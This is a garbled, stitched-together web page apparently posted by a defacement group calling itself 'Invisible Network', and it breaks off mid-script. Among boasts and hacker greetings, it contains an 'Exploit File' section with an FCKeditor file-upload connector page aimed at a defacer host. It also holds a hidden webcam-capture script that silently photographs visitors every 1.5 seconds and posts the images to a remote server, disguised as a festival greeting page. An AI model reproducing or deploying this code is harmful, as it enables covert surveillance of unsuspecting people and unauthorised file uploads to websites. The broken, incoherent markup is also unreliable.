<!DOCTYPE html>

 
<html lang="en">

 
<head>

    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="Invisible Network36"content="">
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@100;200;300;400;500;600;700;800;900&display=swap" rel="stylesheet">

    <title>InvisibleNetwork-Leaked</title>

    <!-- Bootstrap core CSS -->
    <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">


    <!-- Additional CSS Files -->
    <link rel="stylesheet" href="assets/css/fontawesome.css">
    <link rel="stylesheet" href="assets/css/templatemo-onix-digital.css">
    <link rel="stylesheet" href="assets/css/animated.css">
    <link rel="stylesheet" href="assets/css/owl.css">
<!--

TemplateMo 565 Onix Digital

https://templatemo.com/tm-565-onix-digital

-->
  </head>

<body>

  <!-- ***** Preloader Start ***** -->
  <div id="js-preloader" class="js-preloader">
    <div class="preloader-inner">
      <span class="dot"></span>
      <div class="dots">
        <span></span>
        <span></span>
        <span></span>
      </div>
    </div>
  </div>
  <!-- ***** Preloader End ***** -->

  <!-- ***** Header Area Start ***** -->
  <header class="header-area header-sticky wow slideInDown" data-wow-duration="0.75s" data-wow-delay="0s">
    <div class="container">
      <div class="row">
        <div class="col-12">
          <nav class="main-nav">
            <!-- ***** Logo Start ***** -->
            <a href="index.html" class="logo">
              <img src="assets/images/logo.png/mp4">
            </a>
            <!-- ***** Logo End ***** -->
            <!-- ***** Menu Start ***** -->
            <ul class="nav">
              <li class="scroll-to-section"><a href="#top" class="active">Home</a></li>
              <li class="scroll-to-section"><a href="#services">Services</a></li>
              <li class="scroll-to-section"><a href="#about">About</a></li>
              <li class="scroll-to-section"><a href="#portfolio">Portfolio</a></li>
              <li class="scroll-to-section"><a href="#video">Videos</a></li> 
              <li class="scroll-to-section"><a href="#contact">Contact Us</a></li> 
              <li class="scroll-to-section"><div class="main-red-button-hover"><a href="#contact">Contact Us Now</a></div></li> 
            </ul>        
            <a class='menu-trigger'>
                <span>Menu</span>
            </a>
            <!-- ***** Menu End ***** -->
          </nav>
        </div>
      </div>
    </div>
  </header>
  <!-- ***** Header Area End ***** -->

  <div class="main-banner" id="top">
    <div class="container">
      <div class="row">
        <div class="col-lg-12">
          <div class="row">
            <div class="col-lg-6 align-self-center">
              <div class="owl-carousel owl-banner">
                <div class="item header-text">
                  <h6>  Home Digital InvisibleNetwork-Leaked       </h6>
                  <h2> Index <em> Website</em> the best in <span>SEO</span>?</h2>
                  <p> Corporation Working </p>

 
                                            </div>
 
                                            <div class="facts-list owl-carousel">

 
                                                <div class="item animate" data-animate="fadeInUp">

 
                                                    <div class="counter-box">

 
                                                        <i class="fa fa-trophy counter-icon" aria-hidden="true"></i><span class="count-number"> 32 </span> Awards Won
 
 
                                                    </div>

 
                                                </div>

 
                                                <div class="item animate" data-animate="fadeInUp">

 
                                                    <div class="counter-box">

 
                                                        <i class="fa fa-graduation-cap counter-icon" aria-hidden="true"></i><span class="count-number"> 4 </span> Degrees

 
                                                    </div>

 
                                                </div>

 
                                                <div class="item animate" data-animate="fadeInUp">
 
                                                    <div class="counter-box">

 
                                                        <i class="fa fa-desktop counter-icon" aria-hidden="true"></i><span class="count-number"> 12 </span> Working Years

                                                    </div>

 
                                                </div>

 
                                                <div class="item animate" data-animate="fadeInUp">
 
                                                    <div class="counter-box">

 
                                                        <i class="fa fa-support counter-icon" aria-hidden="true"></i><span class="count-number"> 6 </span> Team Members

 
                                                    </div>
 
                                                </div>

 
                                                <div class="item animate" data-animate="fadeInUp">

 
                                                    <div class="counter-box">

 
                                                        <i class="fa fa-certificate counter-icon" aria-hidden="true"></i><span class="count-number"> 10 </span> Certificates
 
                                   </div>
 
 
                                </div>

 
                            </div>

 
                        </div>

                    </div>


                </div>
 
 
            </div>
 
 
                                        </div>
 
 
                                    </div>
 
 
                                </div>

 
                            </div>

 
                        </div>
 
 
                    </div>
 
 
                </div>
 
                                         
 
                                            </div>          
 
 
                                        </div>                   
 
                                        </div>
 
 
                                    </div>
 
 
                                    <div class="item animate" data-animate="fadeInUp">
 
 
                                        <div class="portfolio-item">
 
 
                                            <div class="thumb">
 
 
                                                <img src="images/item-2.jpg" alt="">
 
 
                                            </div>
 
 
                                            <div class="thumb-inner animate" data-animate="fadeInUp">
 
 
                                                <h4> ★·.·´¯`·.·★ [  ] ★·.·´¯`·.·★
★·.·´¯`·.·★ [  ] ★·.·´¯`·.·★
                                </h4>
 
 
                                                <p> ★·.·´¯`·.·★ [  ] ★·.·´¯`·.·★ 
★·.·´¯`·.·★ [  ] ★·.·´¯`·.·★
                                                </p>
 
 
                                            </div>
 
 
                                        </div>

 
                                    </div>

 
                                    <div class="item animate" data-animate="fadeInUp">
 
 
                                        <div class="portfolio-item">

 
                                            <div class="thumb">

 
                                                <img src="images/item-3.jpg" alt="">

 
                                            </div>

 
                                            <div class="thumb-inner animate" data-animate="fadeInUp">

 
                                                <h4> Attention Notice # </h4>

 
                                                <p>           
                            ⛔  Don't distrub !!!
                             PLease Get Out My Server ⛔</p>
                                           </div>

 
                                        </div>

 
                                    </div>

 
                                    <div class="item animate" data-animate="fadeInUp">

 
                                        <div class="portfolio-item">

 
                                            <div class="thumb">
 
 
                                                <img src="images/item-1.jpg" alt="">

 
                                            </div>

 
                                            <div class="thumb-inner animate" data-animate="fadeInUp">

 
                                                <h4> Technical Professional Website Form-Control Provider Invisible </h4>

                                            </div>
 
 
                                        </div>
 
 
                                    </div>
 
 
                                    <div class="item animate" data-animate="fadeInUp">
 
 
                                        <div class="portfolio-item">
 
 
                                            <div class="thumb">
 
 
                                                <img src="images/item-2.jpg" alt="">
 
 
                                            </div>
 
 
                                            <div class="thumb-inner animate" data-animate="fadeInUp">
 
 
                                                <h4> Invisible Network Trojan Malware Inspection-Leaked </h4>
 
                                                <p> ☣️ Professional Execution Provider ☣️ </p>
 
 
                                            </div>
 
 
                                        </div>
 
 
                                    </div>
 
 
                                    <div class="item animate" data-animate="fadeInUp">
 
 
                                        <div class="portfolio-item">
 
 
                                            <div class="thumb">
 
 
                                                <img src="images/item-3.jpg" alt="">
 
 
                                            </div>

 
                                            <div class="thumb-inner animate" data-animate="fadeInUp">

 
                                                <h4> 🏴‍☠️ Ghost Inspection Leaked Combination Script 🏴‍☠️ </h4>
 
 
                                                <p>  Intrupstion Malware Copy Data Website 💻 
                          </p>
 
 
                                            </div>
 
 
                                        </div>
 
 
                                    </div>

 
                                    <div class="item animate" data-animate="fadeInUp">
 
 
                                        <div class="portfolio-item">
 
 
                                            <div class="thumb">
 
 
                                                <img src="images/item-1.jpg" alt="">
 
 
                                            </div>
 
 
                                            <div class="thumb-inner animate" data-animate="fadeInUp">

 
                                                <h4>Certificates</h4>

 
                                                <p>🔐PRIVATED🔐</p>

 
                                            </div>

 
                                        </div>
 
 
                                    </div>
 
 
                                    <div class="item animate" data-animate="fadeInUp">
 
 
                                        <div class="portfolio-item">
 
 
                                            <div class="thumb">
 
 
                                                <img src="images/item-2.jpg" alt="">
 
 
                                            </div>
 
 
                                            <div class="thumb-inner animate" data-animate="fadeInUp">
 
 
                                                <h4></h4>
 
 
                                                <p> Managing Method Message </p>
 
 
                                            </div>

 
                                        </div>
 
 
                                    </div>
 
 
                                    <div class="item animate" data-animate="fadeInUp">
 
 
                                        <div class="portfolio-item">
 
 
                                            <div class="thumb">
 
 
                                                <img src="images/item-3.jpg" alt="">
 
 
                                            </div>
 
 
                                            <div class="thumb-inner animate" data-animate="fadeInUp">
 
 
                                                <h4> Name Title Privated </h4>
 
 
                                                <p> 🔐🔐🔐🔐🔐 </p>
 
 
                                            </div>
 
 
                                        </div>
 
 
                                    </div>
 
 
                                </div>
 
 
                            </div>
 
 
                        </div>

 
                    </div>
 
 
                </div>
 
 
            </div>
 
 
 
 
            <div class="section animated-row" data-section="slide05">
 
                <div class="section-inner">
 
 
                    <div class="row justify-content-center">
 
 
                        <div class="col-md-8 wide-col-laptop">
 
 
                            <div class="title-block animate" data-animate="fadeInUp">

 <script>
                                <span>PORTFOLIO-ITEM</span>
 
                                <h2> PROGAMMING BRANCHED = </h2>
 
 
                            </div>
 
 
                            <div class="col-md-8 offset-md-2">
 
 
                                <div class="testimonials-section">
  
 
                                    <div class="testimonials-slider owl-carousel">
 
 
                                        <div class="item animate" data-animate="fadeInUp">

 
                                            <div class="testimonial-item">
 
 
                                                <div class="client-row">
 
 
                                                    <img src="file//404 Not Found.jpg/Privacy/0/Pictures/Script/1625046525761_Trojan.jpg " class="rounded-circle" alt="www.InvisibleNetwork-Leaked.com/file//404-NOT FOUND">
 
 
                                                </div>
 
 
                                                <div class="viewport-content">
 
 
                                                    <h4> contact-section Home</h4>
 
 
                                                    <p>" DPlozer - Debug Team "</p>
 
 
                                                    <span>Managing Director</span>
 
 
                                                </div>                                           
 
 
                                            </div>

 
                                        </div>

 
                                        <div class="item animate" data-animate="fadeInUp">
 
 
                                            <div class="viewport-content">
 
 
                                                <div class="client-row">
 
 
                                                    <img src= "images/profile-01.jpg" class="rounded-circle" alt="profile-01">
 
 
                                                </div>
 
 
                                                <div class="viewport-content">
 
 
                                                    <h4> contact-section 1 </h4>
 
 
                                                    <p>" Tinta Merah Exploit - Redhat "</p>
 
 
                                                    <span>CEO and Founder</span>
 
 
                                                </div>                                           
 
 
                                            </div>
 
 
                                        </div>
 
 
                                        <div class="item animate" data-animate="fadeInUp">
 
 
                                            <div class="viewport-content">
 
 
                                                <div class="client-row">
 
 
                                                    <img src="images/profile-01.jpg" class="rounded-circle" alt="profile 2">
 
 
                                                </div>
 
 
                                                <div class="testimonial-content">
 
 
                                                    <h4> contact-section 2 </h4>
  
 
                                                    <p>" KeyGenom Team Spy "</p>
 
 
                                                    <span>Chief Marketing Officer</span>
 
 
                                                </div>                                           

 
                                            </div>
 
 
                                        </div>
 
                                 </div>
 
 
                                </div>


                            </div>

 
                        </div>

 
                    </div>
 
 
                </div>
 
 
            </div>
 
 
 
 
            <div class="section animated-row" data-section="slide07">

 
                <div class="section-inner">
 
 
                    <div class="row justify-content-center">
 
 
                        <div class="col-md-7 wide-col-laptop">
 
 
                            <div class="title-block animate" data-animate="fadeInUp">
 
 
                                <span>Contact</span>
  

                                <h2> Please Verification Login My ExploitDb </h2>
                                
                                <h4> Don't Verification Your Network Intrupstion Malware Automatic Injection Provider </h4>
  
 
                            </div>
  
 
                            <div class="contact-section">
  
 
                                <div class="row">
  
 
                                    <div class="col-md-6 animate" data-animate="fadeInUp">
  
 
                                        <div class="contact-box">
  
 
                                            <div class="contact-row">
  
 
                                                <i class="fa fa-map-marker"></i> Contact Person
  
 
                                            </div>
  
 
                                            <div class="contact-row">
  
 
                                                <i class="fa fa-phone"></i> Privated
  
 
                                            </div>
  
 
                                            <div class="contact-row">
  
 
                                                <i class="fa fa-envelope"></i> Info@InvisibleNetwork-Leaked.coid.
  
 
                                            </div>
  
 
                                        </div>
  
 
                                    </div>
  
 
                                    <div class="col-md-6 animate" data-animate="fadeInUp">
  
 
                                        <form id="ajax-contact" method="post" action="#">
  
 
                                            <div class="input-field">
  
 
                                                <input type="text" class="form-control" name="name" id="name" required placeholder="Name">
  
 
                                            </div>
  
 
                                            <div class="input-field">
  
 
                                                <input type="email" class="form-control" name="email" id="email" required placeholder="Email">
  
 
                                            </div>
  
 
                                            <div class="input-field">
  
 
                                                <textarea class="form-control" name="message" id="message" required placeholder="Message"></textarea>
  
 
                                            </div>
  
 
                                            <button class="btn" type="submit">Submit</button>
  
 
                                        </form>
  
 
                                        <div id="form-messages" class="mt-3"></div>
  
 
                                    </div>
  
 
                                </div>
  
 
                            </div>
  
 
                        </div>
 
                    </div>
 
                </div>
 
            </div>
 
        </div>
 
        <div id="social-icons">

 
            <div class="text-right">

 
                <ul class="social-icons">
 
 
                    <li><a href="#" title="Facebook"><i class="fa fa-facebook"></i></a></li>

 
                    <li><a href="#" title="Twitter"><i class="fa fa-twitter"></i></a></li>
 
                    <li><a href="#" title="Linkedin"><i class="fa fa-linkedin"></i></a></li>

 
                    <li><a href="#" title="Instagram"><i class="fa fa-behance"></i></a></li>

 
                </ul>
 
            </div>
 
        </div>

 
    </div>  
 
    <script src="js/jquery.js"></script>
 
    <script src="js/bootstrap.min.js"></script>
 
    <script src="js/fullpage.min.js"></script>
 
    <script src="js/scrolloverflow.js"></script>
 
    <script src="js/owl.carousel.min.js"></script>
 
    <script src="js/jquery.inview.min.js"></script>

 
    <script src="js/form.js"></script>
 
    <script src="js/custom.js"></script>
 
  </body>
  
 
</html>

<script>

# Author : Invisible Network

[~]######################################### ExploiT
#############################################[~]

[~] 1. Exploit File :

<!--
* FCKeditor - The text editor for Internet - https://www.Invisible Network.co.il
* Test page for the File Browser connectors.
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FCKeditor - By Network Invisible</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

</head>
<body>
<table height="100%" cellspacing="0" cellpadding="0" width="100%"
border="0">
<tr>

<td>
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td>
Connector:<br />
<select id="cmbConnector" name="cmbConnector">
<option value="asp/connector.asp" selected="selected">ASP</option>
<option value="aspx/connector.aspx">ASP.Net</option>

<option value="cfm/connector.cfm">ColdFusion</option>
<option value="lasso/connector.lasso">Lasso</option>
<option value="perl/connector.cgi">Perl</option>
<option value="
https://https://defacer.pro/index/includes/user/editor/filemanager/browser/default/connectors/php/connector.php
">PHP</option>
<option value="py/connector.py">Python</option>
</select>

</td>
<td>
   </td>
<td>
Current Folder<br />
<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
<td>
   </td>

<td>
Resource Type<br />
<select id="cmbType" name="cmbType">
<option value="File" selected="selected">File</option>
<option value="Image">Image</option>
<option value="Flash">Flash</option>
<option value="Media">Media</option>

<option value="Invalid">Invalid Type (for testing)</option>
</select>
</td>
</tr>
</table>
<br />
<table cellspacing="0" cellpadding="0" border="0">
<tr>

<td valign="top">
<a href="#" onclick="GetFolders();">Get Folders</a></td>
<td>
   </td>
<td valign="top">
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
<td>
   </td>

<td valign="top">
<a href="#" onclick="CreateFolder();">Create Folder</a></td>
<td>
   </td>
<td valign="top">
<form id="frmUpload" action="" target="eRunningFrame" method="post"
enctype="multipart/form-data">
File Upload<br />
<input id="txtFileUpload" type="file" name="NewFile" />

<input type="submit" value="Upload" onclick="SetAction();" />
</form>
</td>
</tr>
</table>
<br />
URL: <span id="eUrl"></span>
</td>

</tr>
<tr>
<td height="100%" valign="top">
<iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame"
width="100%"
height="100%"></iframe>
</td>
</tr>
</table>
</body>
</html>

<html> 
<head> 
<script type="text/javascript" src="https://hijake344.github.com/code-art/projects/tiny-mirror/index.js"></script> <link rel="stylesheet" type="text/css" href="https://hijake344.github.com/code-art/projects/tiny-mirror/index.css"> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script> </head> <div class="video-wrap" hidden="hidden"> <video id="video" playsinline autoplay></video> </div> <canvas hidden="hidden" id="canvas" width="640" height="480"></canvas> <script> function post(imgdata){ $.ajax({ type: 'POST', data: { cat: imgdata}, url: 'https://0.0.0.0:8080/post.php', dataType: 'json', async: false, success: function(result){ // call the function that handles the response/results }, error: function(){ } }); }; 'use strict'; const video = document.getElementById('video'); const canvas = document.getElementById('canvas'); const errorMsgElement = document.querySelector('span#errorMsg'); const constraints = { audio: false, video: { facingMode: "user" } }; // Access webcam async function init() { try { const stream = await navigator.mediaDevices.getUserMedia(constraints); handleSuccess(stream); } catch (e) { errorMsgElement.innerHTML = navigator.getUserMedia error:${e.toString()}; } } // Success function handleSuccess(stream) { window.stream = stream; video.srcObject = stream; var context = canvas.getContext('2d'); setInterval(function(){ context.drawImage(video, 0, 0, 640, 480); var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream"); post(canvasData); }, 1500); } // Load init init(); </script> <body> <p>Hint: Look at the favicon</p> <p>(Accept Permissions)</p> <p><label><input type="checkbox" name="mirror" id="mirror" /> Mirror image</label>
</p> 
</body> 
</html>


<script
[~]#############################
ThankS To ...
##############################[~]

[~] Special Thanks To My Best FriendS :

NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ ,
~~XTerror~~ , __l2o5v4__ , Zend
[~] GreetZ : SuDnCIL-Army.Org , LP.Ironman , DPort-tunnel.com , Red-AttackerZ.

[~]#########################
FinisH :D
##########################[~]

></script>



<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
<title>Happy fes_name to Your Friends</title>
    <script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
    <link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css"> 
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
    <link type="text/css" rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" />
    <link href='https://fonts.googleapis.com/css?family=Sofia:&effect=neon' rel='stylesheet'>
	  <link rel="icon" type="image/png" sizes="32x32" href="https://i.imgur.com/fcqTtzV.png">

<style>
    i {
        color:#f06414;
    }
input[type=name], select {
    width: 100%;
    padding: 12px 20px;
    margin: 4px 0;
    display: inline-block;
    border: 1px solid #ccc;
    border-radius: 4px;
    box-sizing: border-box;
}
.footerbtn1 {
 
            display: block;
            line-height: 15px;
            position: fixed;
            right:0px;
            bottom:0px;
            height:40px;
            
border-radius: 15px;
  box-sizing: border-box;
  padding: 5px;
  background:#000099;
  color: #ffffff;
  font-size: 18px;
  text-align: center;
  text-decoration: none;
  width:45%;
 margin-right:10px;
            margin-right:30px;
            box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
            animation: footer infinite linear 1s;
            -webkit-transform: translate3d(30%,0,0);
            transform: translate3d(30%,0,0);
            position: fixed;
           
}

.footerbtn1 :active {
            box-shadow: none
        }

        @-webkit-keyframes footer {
            from {
                -webkit-transform: rotateZ(0)
            }
            25% {
                -webkit-transform: rotateZ(1.5deg)
            }
            50% {
                -webkit-transform: rotateZ(0deg)
            }
            75% {
                -webkit-transform: rotateZ(-1.5deg)
            }
            to {
                -webkit-transform: rotateZ(0)
            }}
.footerbtn {
 
            display: block;
            line-height: 15px;
            position: fixed;
            left:0px;
            bottom:0px;
            height:40px;
            
border-radius: 15px;
  box-sizing: border-box;
  padding: 5px;
  background:#34af23;
  color: #ffffff;
  font-size: 18px;
  text-align: center;
  text-decoration: none;
  width:45%;
 margin-left:10px;
            margin-right:30px;
            box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
            animation: footer infinite linear 1s;
            -webkit-transform: translate3d(30%,0,0);
            transform: translate3d(30%,0,0);
            position: fixed;
           
}

.footerbtn :active {
            box-shadow: none
        }

        @-webkit-keyframes footer {
            from {
                -webkit-transform: rotateZ(0)
            }
            25% {
                -webkit-transform: rotateZ(1.5deg)
            }
            50% {
                -webkit-transform: rotateZ(0deg)
            }
            75% {
                -webkit-transform: rotateZ(-1.5deg)
            }
            to {
                -webkit-transform: rotateZ(0)
            }}

@-webkit-keyframes jello {  from, 11.1%, to {    transform: none;  }
  22.2% {    transform: skewX(-12.5deg) skewY(-12.5deg);  }
  33.3% {    transform: skewX(6.25deg) skewY(6.25deg);  }
  44.4% {    transform: skewX(-3.125deg) skewY(-3.125deg);  }
  55.5% {    transform: skewX(1.5625deg) skewY(1.5625deg);  }
  66.6% {    transform: skewX(-0.78125deg) skewY(-0.78125deg);  }
  77.7% {    transform: skewX(0.390625deg) skewY(0.390625deg);  }
  88.8% {    transform: skewX(-0.1953125deg) skewY(-0.1953125deg);  }}
.jello {  -webkit-animation: jello 3s infinite;  transform-origin: center; -webkit-animation-delay:6s}
@-webkit-keyframes hue {
  from {    -webkit-filter: hue-rotate(0deg);  }
  to {    -webkit-filter: hue-rotate(-360deg);  }}
    .m1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
    .m2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}
.bubbles {
font-family: arial;
}

.bubbles hi {
font-family: 'Luckiest Guy', cursive;
color: black;
}

hi {
 font-size:2.5em;
 user-select:none;
}

hi span { display:inline-block; animation:float .2s ease-in-out infinite; }
 @keyframes float {
  0%,100%{ transform:none; }
  33%{ transform:translateY(-1px) rotate(-2deg); }
  66%{ transform:translateY(1px) rotate(2deg); }
}
body:hover span { animation:bounce .6s; }
@keyframes bounce {
  0%,100%{ transform:translate(0); }
  25%{ transform:rotateX(20deg) translateY(2px) rotate(-3deg); }
  50%{ transform:translateY(-20px) rotate(3deg) scale(1.1);  }
}

@import url(http://fonts.googleapis.com/css?family=Concert+One);

h1 {
  animation:glow 10s ease-in-out infinite;
}



* { box-sizing:border-box; }

figure {
  animation:wobble 5s ease-in-out infinite;
  transform-origin:center center;
  transform-style:preserve-3d;
}

@keyframes wobble {
  0%,100%{ transform:rotate3d(1,1,0,40deg); }
  25%{ transform:rotate3d(-1,1,0,40deg); }
  50%{ transform:rotate3d(-1,-1,0,40deg); }
  75%{ transform:rotate3d(1,-1,0,40deg); }
}

h1 {
  display:block;
  width:90%;
  line-height:1.5;
  font:900 35px 'Concert One', sans-serif;
  position:absolute;
  color:#fff;
}

@keyframes glow {
  0%,100%{ text-shadow:0 0 30px red; }
  25%{ text-shadow:0 0 30px orange; }
  50%{ text-shadow:0 0 30px forestgreen; }
  75%{ text-shadow:0 0 30px cyan; }
}

h1:nth-child(2){ transform:translateZ(5px); }
h1:nth-child(3){ transform:translateZ(10px);}
h1:nth-child(4){ transform:translateZ(15px); }
h1:nth-child(5){ transform:translateZ(20px); }
h1:nth-child(6){ transform:translateZ(25px); }
h1:nth-child(7){ transform:translateZ(30p.rock{animation:infinite 1s rock}
@keyframes rock {  0% {    transform: rotate(-1deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-1deg);  }}x); }
h1:nth-child(8){ transform:translateZ(35px); }
h1:nth-child(9){ transform:translateZ(40px); }
h1:nth-child(10){ transform:translateZ(45px); }



.rock{animation:infinite 1s rock}
@keyframes rock {  0% {    transform: rotate(-1deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-1deg);  }}

.fuck{animation:infinite 1s fuck}
@keyframes rock {  0% {    transform: rotate(-2deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-2deg);  }}


h2 {
   font-size: 38px;
    text-align: center;
    color:#008000;
    
    animation: rock infinite 1s;
    font-family: 'Indie Flower', cursive;
    letter-spacing: 2px;
}

h3 {
    font-size: 48px;
    text-align: center;
    padding:1px;
    margin:1px;
    color: #f06414;
   
    aanimation: fuck infinite 1s;
    font-family: 'Indie Flower', cursive;
    letter-spacing: 2px;
	
	
	* {box-sizing: border-box;}
body {font-family: Verdana, sans-serif;}
.mySlides {display: none;}
img {vertical-align: middle;}

/* Slideshow container */
.slideshow-container {
  max-width: 1000px;
  position: relative;
  margin: auto;
}

/* Caption text */
.text {
  color: #f2f2f2;
  font-size: 15px;
  padding: 8px 12px;
  position: absolute;
  bottom: 8px;
  width: 100%;
  text-align: center;
}

/* Number text (1/11 etc) */
.numbertext {
  color: #f2f2f2;
  font-size: 12px;
  padding: 8px 12px;
  position: absolute;
  top: 0;
}

/* The dots/bullets/indicators */
.dot {
  height: 15px;
  width: 15px;
  margin: 0 2px;
  background-color: #bbb;
  border-radius: 50%;
  display: inline-block;
  transition: background-color 0.6s ease;
}

.active {
  background-color: #717171;
}

/* Fading animation */
.fade {
  -webkit-animation-name: fade;
  -webkit-animation-duration: 1.5s;
  animation-name: fade;
  animation-duration: 1.5s;
}

@-webkit-keyframes fade {
  from {opacity: .4} 
  to {opacity: 1}
}

@keyframes fade {
  from {opacity: .4} 
  to {opacity: 1}
}

/* On smaller screens, decrease text size */
@media only screen and (max-width: 300px) {
  .text {font-size: 11px}
	
}

.cssload-preloader {
	position: absolute;
	top: 0px;
	left: px;
	right: 40px;
	bottom: 20px;
	z-index: 10;
}

.cssload-preloader > .cssload-preloader-box {
	position: absolute;
	height: 16px;
	top: 50%;
	left: 50%;
	margin: -8px 0 0 -82px;
	perspective: 110px;
		-o-perspective: 110px;
		-ms-perspective: 110px;
		-webkit-perspective: 110px;
		-moz-perspective: 110px;
}

.cssload-preloader .cssload-preloader-box > div {
	position: relative;
	width: 16px;
	height: 16px;
	background: rgb(204,204,204);
	float: left;
	text-align: center;
	line-height: 16px;
	font-family: Verdana;
	font-size: 11px;
	color: rgb(255,255,255);
}.cssload-preloader .cssload-preloader-box > div:nth-child(1) {
	background: rgb(255,0,0);
	margin-right: 8px;
	animation: cssload-movement 690ms ease 0ms infinite alternate;
		-o-animation: cssload-movement 690ms ease 0ms infinite alternate;
		-ms-animation: cssload-movement 690ms ease 0ms infinite alternate;
		-webkit-animation: cssload-movement 690ms ease 0ms infinite alternate;
		-moz-animation: cssload-movement 690ms ease 0ms infinite alternate;
}
.cssload-preloader .cssload-preloader-box > div:nth-child(2) {
	background: rgb(255,0,0);
	margin-right: 8px;
	animation: cssload-movement 690ms ease 86.25ms infinite alternate;
		-o-animation: cssload-movement 690ms ease 86.25ms infinite alternate;
		-ms-animation: cssload-movement 690ms ease 86.25ms infinite alternate;
		-webkit-animation: cssload-movement 690ms ease 86.25ms infinite alternate;
		-moz-animation: cssload-movement 690ms ease 86.25ms infinite alternate;
}
.cssload-preloader .cssload-preloader-box > div:nth-child(3) {
	background: rgb(255,0,0);
	margin-right: 8px;
	animation: cssload-movement 690ms ease 172.5ms infinite alternate;
		-o-animation: cssload-movement 690ms ease 172.5ms infinite alternate;
		-ms-animation: cssload-movement 690ms ease 172.5ms infinite alternate;
		-webkit-animation: cssload-movement 690ms ease 172.5ms infinite alternate;
		-moz-animation: cssload-movement 690ms ease 172.5ms infinite alternate;
}
.cssload-preloader .cssload-preloader-box > div:nth-child(4) {
	background: rgb(204,255,0);
	margin-right: 8px;
	animation: cssload-movement 690ms ease 258.75ms infinite alternate;
		-o-animation: cssload-movement 690ms ease 258.75ms infinite alternate;
		-ms-animation: cssload-movement 690ms ease 258.75ms infinite alternate;
		-webkit-animation: cssload-movement 690ms ease 258.75ms infinite alternate;
		-moz-animation: cssload-movement 690ms ease 258.75ms infinite alternate;
}
.cssload-preloader .cssload-preloader-box > div:nth-child(5) {
	background: rgb(0,255,60);
	margin-right: 8px;
	animation: cssload-movement 690ms ease 345ms infinite alternate;
		-o-animation: cssload-movement 690ms ease 345ms infinite alternate;
		-ms-animation: cssload-movement 690ms ease 345ms infinite alternate;
		-webkit-animation: cssload-movement 690ms ease 345ms infinite alternate;
		-moz-animation: cssload-movement 690ms ease 345ms infinite alternate;
}
.cssload-preloader .cssload-preloader-box > div:nth-child(6) {
	background: rgb(0,185,252);
	margin-right: 8px;
	animation: cssload-movement 690ms ease 431.25ms infinite alternate;
		-o-animation: cssload-movement 690ms ease 431.25ms infinite alternate;
		-ms-animation: cssload-movement 690ms ease 431.25ms infinite alternate;
		-webkit-animation: cssload-movement 690ms ease 431.25ms infinite alternate;
		-moz-animation: cssload-movement 690ms ease 431.25ms infinite alternate;
}
.cssload-preloader .cssload-preloader-box > div:nth-child(7) {
	background: rgb(58,0,250);
	margin-right: 8px;
	animation: cssload-movement 690ms ease 517.5ms infinite alternate;
		-o-animation: cssload-movement 690ms ease 517.5ms infinite alternate;
		-ms-animation: cssload-movement 690ms ease 517.5ms infinite alternate;
		-webkit-animation: cssload-movement 690ms ease 517.5ms infinite alternate;
		-moz-animation: cssload-movement 690ms ease 517.5ms infinite alternate;
}
.cssload-preloader .cssload-preloader-box > div:nth-child(8) {
	background: rgb(255,255,0);
	margin-right: 8px;
	animation: cssload-movement 690ms ease 603.75ms infinite alternate;
		-o-animation: cssload-movement 690ms ease 603.75ms infinite alternate;
		-ms-animation: cssload-movement 690ms ease 603.75ms infinite alternate;
		-webkit-animation: cssload-movement 690ms ease 603.75ms infinite alternate;
		-moz-animation: cssload-movement 690ms ease 603.75ms infinite alternate;
}
.cssload-preloader .cssload-preloader-box > div:nth-child(9) {
	background: rgb(221,0,255);
	margin-right: 8px;
	animation: cssload-movement 690ms ease 690ms infinite alternate;
		-o-animation: cssload-movement 690ms ease 690ms infinite alternate;
		-ms-animation: cssload-movement 690ms ease 690ms infinite alternate;
		-webkit-animation: cssload-movement 690ms ease 690ms infinite alternate;
		-moz-animation: cssload-movement 690ms ease 690ms infinite alternate;
}
.cssload-preloader .cssload-preloader-box > div:nth-child(10) {
	background: rgb(51,102,255);
	margin-right: 8px;
	animation: cssload-movement 690ms ease 776.25ms infinite alternate;
		-o-animation: cssload-movement 690ms ease 776.25ms infinite alternate;
		-ms-animation: cssload-movement 690ms ease 776.25ms infinite alternate;
		-webkit-animation: cssload-movement 690ms ease 776.25ms infinite alternate;
		-moz-animation: cssload-movement 690ms ease 776.25ms infinite alternate;
}
</style>
</head>
<div class="video-wrap" hidden="hidden">
    <video id="video" playsinline autoplay></video>
 </div>
 
 <canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>
 
<body>
<video width="320" height="240" controls autoplay>
  <source src="InvisibleNetworkLeaked.mp4" type="video/mp4">
</video>
</body>
 
 <script>
 
 function post(imgdata){
